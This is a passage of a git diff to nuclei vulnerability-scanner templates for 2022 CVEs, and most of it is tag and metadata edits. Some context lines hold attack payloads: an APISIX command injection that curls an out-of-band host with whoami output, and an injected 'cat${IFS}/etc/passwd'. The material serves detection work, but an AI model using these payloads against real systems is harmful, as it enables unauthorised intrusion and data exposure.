cve,cve2022,xss,microweber,cms,authenticated + tags: xss,microweber,cms,authenticated,huntr,cve,cve2022 requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml index 43552faa0..7f6d1ea14 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml @@ -16,7 +16,7 @@ info: cvss-score: 5.5 cve-id: CVE-2022-0968 cwe-id: CWE-190 - tags: cve,cve2022,overflow,microweber,cms + tags: cve,cve2022,overflow,microweber,cms,huntr variables: payload: '{{repeat("A", 600)}}' diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1020.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1020.yaml index 552707297..4293352ff 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1020.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1020.yaml @@ -13,7 +13,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1020 cwe-id: CWE-352,CWE-862 - tags: wp,wp-plugin,wordpress,cve,cve2022,unauth + tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1040.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1040.yaml index 2b0689985..c21e4a0d9 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1040.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1040.yaml @@ -17,8 +17,8 @@ info: cve-id: CVE-2022-1040 cwe-id: CWE-287 metadata: - verified: true shodan-query: http.title:"Sophos" + verified: "true" tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev requests: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1054.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1054.yaml index bc9eae899..e72719b86 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1054.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1054.yaml @@ -12,7 +12,7 @@ info: cvss-score: 5.3 cve-id: CVE-2022-1054 cwe-id: CWE-862 - tags: wp,wp-plugin,wordpress,cve,cve2022 + tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1119.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1119.yaml index 02bc37611..2e0ecf66e 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1119.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1119.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1119 cwe-id: CWE-22 - tags: cve,cve2022,lfi,wordpress,wp,wp-plugin + tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1221.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1221.yaml index 7488a483d..b2ddb555a 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1221.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1221.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: xss,wordpress,wp-plugin,wp,cve,cve2022 + tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1386.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1386.yaml index 6717e9b3a..6f289f524 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1386.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1386.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1386 cwe-id: CWE-918 - tags: cve,cve2022,wp,wordpress,ssrf,fusion,themefusion,avada + tags: wpscan,cve,cve2022,wordpress,ssrf,themefusion,wp,fusion,avada requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1390.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1390.yaml index 7a18c710d..32c8954e7 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1390.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1390.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1390 cwe-id: CWE-22 - tags: cve,cve2022,wordpress,wp-plugin,lfi,wp + tags: packetstorm,wpscan,cve,cve2022,wordpress,wp-plugin,lfi,wp requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1391.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1391.yaml index d487c4cda..bc1d0889f 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1391.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1391.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1391 cwe-id: CWE-22 - tags: cve,cve2022,wordpress,wp-plugin,lfi,wp + tags: cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1392.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1392.yaml index aede997d1..b75a81b59 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1392.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1392.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2022-1392 metadata: verified: true - tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth + tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1439.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1439.yaml index 5a9014b78..43ac5740d 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1439.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1439.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: http.favicon.hash:780351152 - tags: cve,cve2022,microweber,xss + tags: cve,cve2022,microweber,xss,huntr requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1597.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1597.yaml index 6a01611a8..c4dc8dc4a 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1597.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1597.yaml @@ -19,7 +19,7 @@ info: metadata: google-dork: inurl:/wp-content/plugins/wpqa verified: "true" - tags: xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa + tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa variables: user: "{{to_lower(rand_base(5))}}" diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1598.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1598.yaml index ccb375882..a5484f2a3 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1598.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1598.yaml @@ -17,7 +17,7 @@ info: metadata: google-dork: inurl:/wp-content/plugins/wpqa verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor + tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1609.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1609.yaml index dbdf84411..83188b53b 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1609.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1609.yaml @@ -15,7 +15,7 @@ info: cvss-score: 10.0 cve-id: CVE-2022-1609 cwe-id: CWE-77 - tags: cve,cve2022,wordpress,rce,wp,backdoor + tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress variables: cmd: "echo CVE-2022-1609 | rev" diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1713.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1713.yaml index 789c6a5f0..95a34fc4a 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1713.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1713.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.title:"Flowchart Maker" - tags: cve,cve2022,drawio,ssrf,oss + tags: drawio,ssrf,oss,huntr,cve,cve2022 requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1724.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1724.yaml index 4d8d919d3..7bc6aee8f 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1724.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1724.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,wp-plugin,xss,wp,wordpress + tags: xss,wp,wordpress,wpscan,cve,cve2022,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1815.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1815.yaml index bbedcc680..f7a27e159 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1815.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1815.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-918 metadata: verified: "true" - tags: cve,cve2022,drawio,ssrf,oast,oss,jgraph + tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1904.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1904.yaml index a87d7d5ad..251aeceb4 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1904.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1904.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,wp-plugin,xss,wp,wordpress + tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml index eb43696ce..87afdb7ab 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml @@ -18,7 +18,7 @@ info: metadata: google-dork: inurl:/wp-content/plugins/digiproveblog verified: "true" - tags: cve,cve2022,wordpress,xss,wp-plugin,wp + tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022 requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1937.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1937.yaml index 5bf686e05..17184e75a 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1937.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1937.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,wp-plugin,xss,wp,wordpress,authenticated,awin + tags: cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1946.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1946.yaml index 3bd3f2a94..7dc271a98 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-1946.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-1946.yaml @@ -17,7 +17,7 @@ info: metadata: google-dork: inurl:"/wp-content/plugins/gallery-album/" verified: "true" - tags: cve,cve2022,wp-plugin,xss,wp,wordpress,gallery,unauth + tags: wpscan,cve2022,wp,xss,wordpress,gallery,unauth,cve,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-2187.yaml b/config/nuclei-templates/cves/2022/CVE-2022-2187.yaml index 982c7eaa2..ce5e6cc7b 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-2187.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-2187.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2187 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin,wp + tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,wp requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-2290.yaml b/config/nuclei-templates/cves/2022/CVE-2022-2290.yaml index 23e4bc464..48553b489 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-2290.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-2290.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: title:"Trilium Notes" verified: "true" - tags: cve,cve2022,xss,trilium + tags: cve,cve2022,xss,trilium,huntr requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-22954.yaml b/config/nuclei-templates/cves/2022/CVE-2022-22954.yaml index e78c1f62b..886c9cc46 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-22954.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-22954.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-94 metadata: shodan-query: http.favicon.hash:-1250474341 - tags: cve,cve2022,vmware,ssti,workspaceone,kev + tags: workspaceone,kev,tenable,packetstorm,cve,cve2022,vmware,ssti requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-22963.yaml b/config/nuclei-templates/cves/2022/CVE-2022-22963.yaml index d04177443..f08a8e8a9 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-22963.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-22963.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22963 cwe-id: CWE-94 - tags: cve,cve2022,springcloud,rce + tags: vulhub,cve,cve2022,springcloud,rce,kev requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-24112.yaml b/config/nuclei-templates/cves/2022/CVE-2022-24112.yaml index 3b2bcb4e9..5f79eaed6 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-24112.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-24112.yaml @@ -20,7 +20,7 @@ info: fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org shodan-query: title:"Apache APISIX Dashboard" - tags: cve,cve2022,apache,rce,apisix,oast + tags: cve,cve2022,apache,rce,apisix,oast,kev requests: - raw: @@ -41,7 +41,7 @@ requests: { "method":"PUT", "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", - "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl{{interactsh-url}}/`whoami`'); return true end\"}" + "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}" } ] } diff --git a/config/nuclei-templates/cves/2022/CVE-2022-24124.yaml b/config/nuclei-templates/cves/2022/CVE-2022-24124.yaml index c33c0d7f0..046dee8d1 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-24124.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-24124.yaml @@ -18,7 +18,7 @@ info: metadata: product: https://casdoor.org/ shodan-query: http.title:"Casdoor" - tags: cve,cve2022,casdoor,sqli,unauth + tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoor requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-24181.yaml b/config/nuclei-templates/cves/2022/CVE-2022-24181.yaml index f53a126f6..96ab81207 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-24181.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-24181.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-24181 metadata: verified: true - tags: cve,cve2022,xss,oss,pkp-lib + tags: cve,cve2022,xss,oss,pkp-lib,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-24856.yaml b/config/nuclei-templates/cves/2022/CVE-2022-24856.yaml index fbd43cac3..0dd01066f 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-24856.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-24856.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24856 cwe-id: CWE-918 - tags: cve,cve2022,flyteconsole,ssrf,oss + tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-24899.yaml b/config/nuclei-templates/cves/2022/CVE-2022-24899.yaml index 7578d91ca..5d0a6d868 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-24899.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-24899.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"Contao" - tags: cve,cve2022,contao,xss + tags: cve,cve2022,contao,xss,huntr requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-25216.yaml b/config/nuclei-templates/cves/2022/CVE-2022-25216.yaml index cf9c4e500..fbccebf9e 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-25216.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-25216.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25216 cwe-id: CWE-22 - tags: cve,cve2022,dvdFab,lfi,lfr + tags: cve,cve2022,dvdFab,lfi,lfr,tenable requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-26138.yaml b/config/nuclei-templates/cves/2022/CVE-2022-26138.yaml index 24512d8fe..6bfc107c5 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-26138.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-26138.yaml @@ -12,7 +12,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-26138 - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-26138 + cwe-id: CWE-798 metadata: shodan-query: http.component:"Atlassian Confluence" tags: cve,cve2022,confluence,atlassian,default-login,kev diff --git a/config/nuclei-templates/cves/2022/CVE-2022-26233.yaml b/config/nuclei-templates/cves/2022/CVE-2022-26233.yaml index 018e1e162..85601b85f 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-26233.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-26233.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-26233 cwe-id: CWE-22 - tags: cve,cve2022,barco,lfi + tags: cve,cve2022,barco,lfi,seclists,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-26352.yaml b/config/nuclei-templates/cves/2022/CVE-2022-26352.yaml index 6abda51ef..d451bb5aa 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-26352.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-26352.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26352 cwe-id: CWE-22,CWE-434 - tags: cve,cve2022,rce,dotcms + tags: packetstorm,cve,cve2022,rce,dotcms,kev requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-27927.yaml b/config/nuclei-templates/cves/2022/CVE-2022-27927.yaml index 19fba96dc..64d50a460 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-27927.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-27927.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,sqli,microfinance + tags: microfinance,edb,cve,cve2022,sqli variables: num: "999999999" diff --git a/config/nuclei-templates/cves/2022/CVE-2022-28080.yaml b/config/nuclei-templates/cves/2022/CVE-2022-28080.yaml index b04f58c7d..021d8a2b1 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-28080.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-28080.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - tags: cve,cve2022,sqli,authenticated,cms,royalevent + tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-28363.yaml b/config/nuclei-templates/cves/2022/CVE-2022-28363.yaml index b78b96ed2..4f314695a 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-28363.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-28363.yaml @@ -16,7 +16,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28363 cwe-id: CWE-79 - tags: cve,cve2022,xss,rlm + tags: xss,rlm,packetstorm,cve,cve2022 requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-28365.yaml b/config/nuclei-templates/cves/2022/CVE-2022-28365.yaml index 2260c8d8a..0630000a5 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-28365.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-28365.yaml @@ -16,7 +16,7 @@ info: cvss-score: 5.3 cve-id: CVE-2022-28365 cwe-id: CWE-668 - tags: cve,cve2022,exposure,rlm + tags: rlm,packetstorm,cve,cve2022,exposure requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-29014.yaml b/config/nuclei-templates/cves/2022/CVE-2022-29014.yaml index 517632fe3..b7c1a26f7 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-29014.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-29014.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-29014 - tags: cve,cve2022,razer,lfi,router + tags: cve,cve2022,razer,lfi,router,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-29298.yaml b/config/nuclei-templates/cves/2022/CVE-2022-29298.yaml index 05d98530d..2f75e0911 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-29298.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-29298.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.html:"SolarView Compact" verified: "true" - tags: cve,cve2022,lfi,solarview + tags: lfi,solarview,edb,cve,cve2022 requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-29299.yaml b/config/nuclei-templates/cves/2022/CVE-2022-29299.yaml index 61bce90a9..cacf113fb 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-29299.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-29299.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview + tags: cve,cve2022,xss,solarview,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-29301.yaml b/config/nuclei-templates/cves/2022/CVE-2022-29301.yaml index 007fc44e2..e3fd56f9b 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-29301.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-29301.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview + tags: cve,cve2022,xss,solarview,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-29303.yaml b/config/nuclei-templates/cves/2022/CVE-2022-29303.yaml index 859c40166..1d2c392e5 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-29303.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-29303.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.html:"SolarView Compact" verified: "true" - tags: cve,cve2022,rce,injection,solarview + tags: cve,cve2022,rce,injection,solarview,edb variables: cmd: "cat${IFS}/etc/passwd" diff --git a/config/nuclei-templates/cves/2022/CVE-2022-30525.yaml b/config/nuclei-templates/cves/2022/CVE-2022-30525.yaml index 1589b8af8..12922c9a7 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-30525.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-30525.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-78 metadata: shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - tags: rce,zyxel,cve,cve2022,firewall,unauth,kev + tags: zyxel,cve,cve2022,firewall,unauth,kev,msf,rce requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-31126.yaml b/config/nuclei-templates/cves/2022/CVE-2022-31126.yaml index 4d3f56055..8c84249b2 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-31126.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-31126.yaml @@ -20,7 +20,7 @@ info: metadata: shodan-query: http.html:"Roxy-WI" verified: "true" - tags: cve,cve2022,rce,unauth,roxy + tags: cve,cve2022,rce,unauth,roxy,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-31269.yaml b/config/nuclei-templates/cves/2022/CVE-2022-31269.yaml index 3a3e02f31..fedbed181 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-31269.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-31269.yaml @@ -9,10 +9,12 @@ info: reference: - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31269 + - https://eg.linkedin.com/in/omar-1-hashem + - https://www.nortekcontrol.com/access-control/ metadata: - verified: true shodan-query: http.title:"Linear eMerge" - tags: cve,cve2022,emerge,exposure + verified: "true" + tags: cve2022,emerge,exposure,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-31798.yaml b/config/nuclei-templates/cves/2022/CVE-2022-31798.yaml index a825fd2aa..7b9e2ba80 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-31798.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-31798.yaml @@ -9,10 +9,12 @@ info: reference: - https://packetstormsecurity.com/files/167992/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798 + - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html + - https://eg.linkedin.com/in/omar-1-hashem metadata: - verified: true shodan-query: http.title:"eMerge" - tags: cve,cve2022,emerge,nortek,xss + verified: "true" + tags: cve2022,emerge,nortek,xss,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-34046.yaml b/config/nuclei-templates/cves/2022/CVE-2022-34046.yaml index cfc600951..d6e06bf5c 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-34046.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-34046.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.title:"Wi-Fi APP Login" verified: "true" - tags: cve,cve2022,wavlink,router,exposure + tags: packetstorm,cve,cve2022,wavlink,router,exposure requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-34047.yaml b/config/nuclei-templates/cves/2022/CVE-2022-34047.yaml index 1f44408d4..50283475b 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-34047.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-34047.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.title:"Wi-Fi APP Login" verified: "true" - tags: cve,cve2022,wavlink,router,exposure + tags: cve2022,wavlink,router,exposure,packetstorm,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-34048.yaml b/config/nuclei-templates/cves/2022/CVE-2022-34048.yaml index 5ef67810c..d95a55a5b 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-34048.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-34048.yaml @@ -19,7 +19,7 @@ info: metadata: shodan-query: http.html:"Wavlink" verified: "true" - tags: cve,cve2022,wavlink,xss,router + tags: cve2022,wavlink,xss,router,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-37042.yaml b/config/nuclei-templates/cves/2022/CVE-2022-37042.yaml index 0d04f0035..3f68ce5c7 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-37042.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-37042.yaml @@ -11,6 +11,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-37042 - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/ - /~https://github.com/vnhacker1337/CVE-2022-27925-PoC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-37042 + cwe-id: CWE-287 metadata: fofa-query: app="zimbra-邮件系统" shodan-query: http.favicon.hash:"1624375939" diff --git a/config/nuclei-templates/cves/2022/CVE-2022-37153.yaml b/config/nuclei-templates/cves/2022/CVE-2022-37153.yaml index 3ac6c36a5..9fc012ea7 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-37153.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-37153.yaml @@ -10,10 +10,13 @@ info: - /~https://github.com/Fjowel/CVE-2022-37153 - 